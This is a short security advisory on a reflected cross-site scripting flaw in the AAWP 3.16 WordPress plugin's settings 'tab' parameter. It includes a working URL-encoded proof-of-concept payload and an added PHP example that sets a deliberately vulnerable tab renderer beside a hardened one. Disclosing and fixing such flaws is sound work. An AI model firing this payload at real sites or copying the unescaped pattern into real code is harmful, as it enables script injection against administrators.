WordPress aawp 3.16 cross site scripting
2022-06-23 06:07:00 【Khan security team】
Vendor homepage: https://getaawp.com/
Software link: https://getaawp.com/
Version: 3.16
Tested on: Windows 10, Chrome, WordPress 5.8.2
Proof of concept:
1- Install and activate the AAWP 3.16 plugin.
2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
3- Put the payload in the tab parameter. XSS payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
4- The XSS is triggered.
Opening the URL "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y" triggers the XSS.
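The advisory shows the `tab` query parameter being reflected into the settings page unescaped. The following is an added illustration, not AAWP's own code: a simplified WordPress settings-tab renderer in the vulnerable form and in a hardened form. It assumes WordPress is loaded (esc_attr, esc_html, esc_url, add_query_arg, admin_url, sanitize_key), and the tab list `AAWP_DEMO_TABS` is a hypothetical one.

```php
<?php
// Added example (not AAWP's code): how a ?tab= parameter leaks into markup
// and how to fix it. Assumes it runs inside WordPress.

// Hypothetical whitelist of tabs the settings page really supports.
const AAWP_DEMO_TABS = array( 'general', 'api', 'output', 'licenses' );

// VULNERABLE: the raw query value is concatenated into an attribute and into
// text, so quotes and tags inside ?tab= become live markup (reflected XSS).
function render_settings_tabs_vulnerable( $tab ) {
    $html = '';
    foreach ( AAWP_DEMO_TABS as $name ) {
        $class = ( $name === $tab ) ? 'nav-tab nav-tab-active' : 'nav-tab';
        $html .= '<a class="' . $class . '" href="?page=aawp-settings&tab=' . $name . '">'
               . ucfirst( $name ) . '</a>';
    }
    // Two sinks: an attribute value and an HTML text node, both unescaped.
    $html .= '<div id="tab-' . $tab . '">Current tab: ' . $tab . '</div>';
    return $html;
}

// HARDENED: reject anything that is not a known tab, then still escape for
// the exact output context (attribute, text, URL) as defence in depth.
function render_settings_tabs_hardened( $tab ) {
    if ( ! in_array( $tab, AAWP_DEMO_TABS, true ) ) {
        $tab = 'general'; // unknown or hostile value: fall back, do not echo
    }
    $html = '';
    foreach ( AAWP_DEMO_TABS as $name ) {
        $class = ( $name === $tab ) ? 'nav-tab nav-tab-active' : 'nav-tab';
        $url   = add_query_arg(
            array( 'page' => 'aawp-settings', 'tab' => $name ),
            admin_url( 'admin.php' )
        );
        $html .= '<a class="' . esc_attr( $class ) . '" href="' . esc_url( $url ) . '">'
               . esc_html( ucfirst( $name ) ) . '</a>';
    }
    $html .= '<div id="tab-' . esc_attr( $tab ) . '">Current tab: ' . esc_html( $tab ) . '</div>';
    return $html;
}

// Reading the parameter: sanitize_key() keeps only [a-z0-9_-], which on its
// own removes the quotes, angle brackets and '@' the advisory's payload needs.
$current_tab = isset( $_GET['tab'] ) ? sanitize_key( wp_unslash( $_GET['tab'] ) ) : 'general';
echo render_settings_tabs_hardened( $current_tab );
```

With the whitelist in place the payload never reaches an output sink; the escaping calls only matter if a future change starts echoing values that are not on the list.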